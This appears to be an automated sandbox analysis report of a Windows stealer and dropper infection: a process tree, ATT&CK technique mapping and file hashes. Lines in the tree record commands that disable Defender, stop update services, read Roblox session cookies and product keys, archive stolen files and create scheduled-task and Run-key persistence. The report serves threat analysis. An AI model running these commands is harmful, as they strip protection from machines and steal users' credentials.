C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1880
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1928
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1968
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1312
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2680
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2788
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2896
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2992
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3444
-
C:\Users\Admin\AppData\Local\Temp\mainn.exe"C:\Users\Admin\AppData\Local\Temp\mainn.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Users\Admin\AppData\Roaming\main.exe"C:\Users\Admin\AppData\Roaming\main.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Users\Admin\AppData\Roaming\main.exe"C:\Users\Admin\AppData\Roaming\main.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI35042\Build.exe -pbeznogym5⤵
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Users\Admin\AppData\Local\Temp\_MEI35042\Build.exeC:\Users\Admin\AppData\Local\Temp\_MEI35042\Build.exe -pbeznogym6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\ProgramData\Microsoft\hacn.exe"C:\ProgramData\Microsoft\hacn.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI35682\s.exe -pbeznogym9⤵
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Users\Admin\AppData\Local\Temp\_MEI35682\s.exeC:\Users\Admin\AppData\Local\Temp\_MEI35682\s.exe -pbeznogym10⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\ProgramData\svchost.exe"C:\ProgramData\svchost.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"12⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "13⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe"C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"14⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3208 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xiercdjh\xiercdjh.cmdline"15⤵
- Drops file in System32 directory
PID:940 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5A6.tmp" "c:\Windows\System32\CSC53459E939ED4494494129E178E3262D8.TMP"16⤵PID:1636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CyuiE2IOf7.bat"15⤵PID:3916
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:4700
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:216⤵PID:3828
-
-
C:\Users\Public\Videos\wininit.exe"C:\Users\Public\Videos\wininit.exe"16⤵
- Executes dropped EXE
PID:2696
-
-
-
-
-
-
-
C:\ProgramData\main.exe"C:\ProgramData\main.exe"11⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4416 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpAB34.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpAB34.tmp.bat12⤵PID:2264
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 4416"13⤵
- Enumerates processes with tasklist
PID:1636
-
-
C:\Windows\system32\find.exefind ":"13⤵PID:3672
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak13⤵
- Delays execution with timeout.exe
PID:4812
-
-
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"13⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:2664 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f14⤵PID:3552
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f15⤵
- Adds Run key to start application
- Modifies registry key
PID:4552
-
-
-
-
-
-
C:\ProgramData\setup.exe"C:\ProgramData\setup.exe"11⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:4424
-
-
-
-
-
-
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\ProgramData\Microsoft\based.exe"C:\ProgramData\Microsoft\based.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"9⤵
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"9⤵
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌   .scr'"9⤵
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌   .scr'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"9⤵
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Windows\system32\tasklist.exetasklist /FO LIST10⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"9⤵
- Suspicious use of WriteProcessMemory
PID:1200 -
C:\Windows\system32\tasklist.exetasklist /FO LIST10⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"9⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"9⤵PID:4960
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY10⤵
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI34922\rar.exe a -r -hp"amnesia" "C:\Users\Admin\AppData\Local\Temp\94z4R.zip" *"9⤵PID:3344
-
C:\Users\Admin\AppData\Local\Temp\_MEI34922\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI34922\rar.exe a -r -hp"amnesia" "C:\Users\Admin\AppData\Local\Temp\94z4R.zip" *10⤵
- Executes dropped EXE
PID:2472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"9⤵PID:3408
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:1296
-
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption10⤵
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"9⤵PID:3888
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:4852
-
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory10⤵
- Suspicious use of AdjustPrivilegeToken
PID:1200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"9⤵PID:2164
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid10⤵PID:3164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"9⤵PID:880
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER10⤵
- Command and Scripting Interpreter: PowerShell
PID:4052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"9⤵PID:904
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name10⤵
- Detects videocard installed
PID:1176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"9⤵PID:4584
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault10⤵PID:4820
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\system user.exe"C:\Users\Admin\AppData\Roaming\system user.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:2824
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:4892
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2444
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:936
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1036
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4416
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4412
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:2632
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"2⤵PID:3672
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4340
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:3392
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3644
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3832
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3992
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3212
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1956
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:4936
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3576
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:632
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3148
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:3896
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:3328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\TextInputHost.exe'" /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3840
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Users\All Users\TextInputHost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4724
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\TextInputHost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4980
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Music\RuntimeBroker.exe'" /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3772
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Public\Music\RuntimeBroker.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5100
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Music\RuntimeBroker.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4012
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Users\Public\Videos\wininit.exe'" /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1512
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Public\Videos\wininit.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4504
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Videos\wininit.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4020
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1748
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1924
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2548
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\MSBuild\cmd.exe'" /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2648
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\cmd.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:840
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\MSBuild\cmd.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2144
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:2168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:4500
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1748
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:3112
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.4MB
MD5f0c5fdda9d547c0e9bdacc96abeef7bc
SHA1d3a9fa51227dd5acfb503a2842bf7edba78310d7
SHA25662b4a5552a2b10b631c1499d8a65488f6feb3623f4a682dc3020a12ea81ef918
SHA512723e00405262341c9b02c8a88bb7d9afd4dfdda04e506f1734292260f9277f0e0bdf329961af927807dd2db3015e50afeb431b1dfdbe7b6a89b1c9f766abedd0
-
Filesize
14.9MB
MD52f20a53d05d89d72a94192a6b8098b77
SHA15558fea4d61191ae61f1996a2800b7a17a3f34e0
SHA25626c5013c45b75f401bdf8c8389bb66b9f17bdc1cd0851a8b1803ec7a85dbd96a
SHA512147e0243ff304aa5316a0e1389f55c969193bf8513e893bf8fe7c1f3d9ff37afbb0cbbeeb966a98fc728e6b81b14bf4e440e5989e485fe461bb8bf7dc93b814e
-
Filesize
5.6MB
MD53d3c49dd5d13a242b436e0a065cd6837
SHA1e38a773ffa08452c449ca5a880d89cfad24b6f1b
SHA256e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf
SHA512dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00
-
Filesize
5.4MB
MD51274cbcd6329098f79a3be6d76ab8b97
SHA153c870d62dcd6154052445dc03888cdc6cffd370
SHA256bbe5544c408a6eb95dd9980c61a63c4ebc8ccbeecade4de4fae8332361e27278
SHA512a0febbd4915791d3c32531fb3cf177ee288dd80ce1c8a1e71fa9ad59a4ebddeef69b6be7f3d19e687b96dc59c8a8fa80afff8378a71431c3133f361b28e0d967
-
Filesize
3.9MB
MD545c59202dce8ed255b4dbd8ba74c630f
SHA160872781ed51d9bc22a36943da5f7be42c304130
SHA256d07c47f759245d34a5b94786637c3d2424c7e3f3dea3d738d95bf4721dbf3b16
SHA512fff5b16ae38681ed56782c0f0423560dab45065685d7272424206f43c80486318180aa22d66bd197c8c530e4c24dbaaaa020beb76b619dc767ee59faa27e23ed
-
Filesize
58KB
MD5343e1a85da03e0f80137719d48babc0f
SHA10702ba134b21881737585f40a5ddc9be788bab52
SHA2567b68a4ba895d7bf605a4571d093ae3190eac5e813a9eb131285ae74161d6d664
SHA5121b29efad26c0a536352bf8bb176a7fe9294e616cafb844c6d861561e59fbda35e1f7c510b42e8ed375561a5e1d2392b42f6021acc43133a27ae4b7006e465ba8
-
Filesize
25KB
MD50e5997263833ce8ce8a6a0ec35982a37
SHA196372353f71aaa56b32030bb5f5dd5c29b854d50
SHA2560489700a866dddfa50d6ee289f7cca22c6dced9fa96541b45a04dc2ffb97122e
SHA512a00a667cc1bbd40befe747fbbc10f130dc5d03b777cbe244080498e75a952c17d80db86aa35f37b14640ed20ef21188ea99f3945553538e61797b575297c873f
-
Filesize
97KB
MD5fc97530e935734d3f650a5b410d8f4cb
SHA1b5a3a0711a3a06adf57a1140f68ce4658624d473
SHA256b456572f858b10c5e7496addf5eb665e829a73210249b74401b029d826705b57
SHA512e8d9c24b4dc30291a4db43016e0ebbb0408538d84b07a44cb0c3abcc1ea8d3f3b18390b5f8643aee12e655b992a2fefc4714bdd0c0a42f804d16b151d558905a
-
Filesize
29KB
MD508b000c3d990bc018fcb91a1e175e06e
SHA1bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA5128820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf
-
Filesize
222KB
MD5264be59ff04e5dcd1d020f16aab3c8cb
SHA12d7e186c688b34fdb4c85a3fce0beff39b15d50e
SHA256358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d
SHA5129abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248
-
Filesize
615KB
MD59c223575ae5b9544bc3d69ac6364f75e
SHA18a1cb5ee02c742e937febc57609ac312247ba386
SHA25690341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA51257663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09
-
Filesize
463B
MD51e466c48fe2fef11884599f81b0cfd5a
SHA18765d27b2d0bd7631a78296dd636e543652301f7
SHA256d6ffb579f6ad67fe16ef0554caccf30d15895442fa973aeeee2a78c932be5b49
SHA5121b777b19120d0368b6175924f028738060ffa112a2c49c3295f032234a4e5df986250102c6deed2c81c164b39a5b9d1f578010f044b582f6f583d63dae0762ad
-
Filesize
644KB
MD574b347668b4853771feb47c24e7ec99b
SHA121bd9ca6032f0739914429c1db3777808e4806b0
